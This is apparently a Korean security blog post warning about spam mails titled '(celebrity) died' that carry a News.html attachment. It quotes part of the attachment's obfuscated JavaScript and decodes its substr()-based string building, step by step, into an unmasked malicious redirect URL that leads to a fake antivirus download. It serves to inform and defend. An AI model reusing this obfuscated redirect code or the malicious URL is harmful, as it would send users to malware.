[SpamMail] "OOO(유명인사) died" 제목으로 전파 되는 메일 주의!!

유명인사의 죽음을 알리는 스팸메일이 국내에서 발견되었다.

메일에는 News.htm  파일이 첨부 되어 있다.

이번에도 첨부파일은 자바스크립트(JavaScript)로 이루어져 있으며, 

Replace가 아닌 substr() Method를 이용하여 복호화가 이루어진다.

결과적으론 URL Redirection과 동일한 수법이다.

제목 : Cameron Diaz died

본문 : David Beckham died along with 34 other people when the Air Force CT-43 "Bobcat" passenger plane carrying the group on a trip crashed into a mountainside while approaching the Dubrovnik airport in Croatia during heavy rain and poor visibility.

Please see attachment

첨부파일 : News.html

해당 스팸메일은 다른 제목으로도 전파되고 있다.

모두 "OOO died" 라는 공통으로 들어가 있으니~ 주의하기 바란다.

Alicia Keys died

Angelina Jolie died

Beyonce Knowles died

Bon Jovi died

Brad Pitt died

Cameron Diaz died

David Beckham died

Gwen Stefani died

J.K. Rowling died

Jay-Z died

Jennifer Aniston died

Jennifer Lopez died

Johnny Depp died

Justin Timberlake died

Kanye West died

Madonna died

Miley Cyrus died

Nicole Kidman died

Oprah Winfrey died

Ronaldinho died

Tiger Woods died

Tom Cruise died

여기서 첨부파일을 잠시 살펴보면 다음과 같다.

(해당 내용으로 인하여 블로그 접속 시 악성으로 탐지 할 수도 있다. 놀라지 마시길)

<!-- C/C v0221 --><script>function j(){};var jC=37432;nL=false;j.prototype = {z : function() {this.m="";this.b=false;this.u="";this.r=56048;var l=33035;this.c="c";var
-------------------------------------------- (생략) -----------------------------------------------------
x=y[String("lo"+"ca"+"tiZw9V".substr(0,2)+"on")];this.p='';q='';yD="yD";this.zQ="zQ";d='';this.zQK="";x[new String("hre3y9b".substr(0,3)+"hv5f5hv".substr(3,1))]=new String("http:P5v".substr(0,5)+"//panHSOY".substr(0,5)+"3aPiplusP3a".substr(3,5)+".com.V4Hq".substr(0,5)+
"mx/1.0Xq".substr(0,5)+"HFkhtmlFHk".substr(3,4));o='';this.pL='';this.k='';kH=false;this.uE=false;lA=61928;
var n=false;}};this.vJ=45544;this.oD="";var sN=new j(); f=false;jG="";sN.z();this.eN="eN";</script>

이번 파일에서 가장 눈여겨 볼 것은 바로 "substr()" 메소드이다. 잠시 substr에 대해서 알아보자.

Definition and Usage

The substr() method extracts the characters from a string, beginning at "start" and through the specified number of character, and returns the new sub string.

Syntax

string.substr(start,length)

Parameter	Description
start	Required. The index where to start the extraction. First character is at index 0
length	Optional. The number of characters to extract. If omitted, it extracts the rest of the string

---

Browser Support

    

The substr() method is supported in all major browsers.

위의 내용을 보면 알겠지만, 간략히 설명하면 다음과 같다.

"문자열".substr(위치, 길이)

위치는 전체 문자열에서 시작되는 위치(index는 0)

길이는 전체 문자열에서 시작 된 위치에서 반환 할 문자의 갯수)

그럼 다시 News.html을 살펴보자.

URL로 의심되는 부분은 이 부분이다.

String("http:P5v".substr(0,5)+"//panHSOY".substr(0,5)+"3aPiplusP3a".substr(3,5)+".com.V4Hq".substr(0,5)+
"mx/1.0Xq".substr(0,5)+"HFkhtmlFHk".substr(3,4))

"http:P5v".substr(0,5) -> 0부터 5개의 문자열 반환 -> http:

"//panHSOY".substr(0,5) -> 0부터 5개의 문자열 반환 -> //pan

"3aPiplusP3a".substr(3,5) -> 3부터 5개의 문자열 반환 -> iplus

".com.V4Hq".substr(0,5) -> 0부터 5개의 문자열 반환 -> .com.

"mx/1.0Xq".substr(0,5) -> 0부터 5개의 문자열 반환 -> mx/1.

"HFkhtmlFHk".substr(3,4) -> 3부터 4개의 문자열 반환 -> html

결론적으로 "http://paniplus.com.mx/1.html" 의 문자열이 조합이 된다.

1.html은 다음과 같이 리다이렉션 된다.

http://cetog****.**.cc/scan***10/?afid=24

http://analytic*****.in/wiki/index.php?sid=151&search=ecard&refresh=on&ajax=redirect&db=param

http://analytic*****.in/wiki/js.php

하지만 분석 시, 사이트 접속이 되지 않아 파일을 다운로드 할 수는 없었다.

구글신에게 물어본 결과, 다운로드 되는 파일은 antivirus.exe 파일로써 허위백신이였다.

http://www.virustotal.com/file-scan/report.html?id=16710019fe258706e7d8bee5e3cb9b83cc60a65bd98748df9ef6da1e286a275b-1282439407

- 관련글

2010/06/23 - [악성코드소식] - [SpamMail] "My Husband, My Lover" 제목으로 전파 되는 메일 주의!!
2010/06/17 - [악성코드소식] - [SpamMail] "Reset your Twitter password" 제목으로 전파 되는 메일 주의!!
2010/06/17 - [악성코드소식] - [SpamMail] 유명 SNS(Social Network Service)를 가장한 패스워드 변경 메일 주의!!
2010/06/11 - [악성코드소식] - [SpamMail] "New discounts daily" 제목으로 전파 되는 메일 주의!!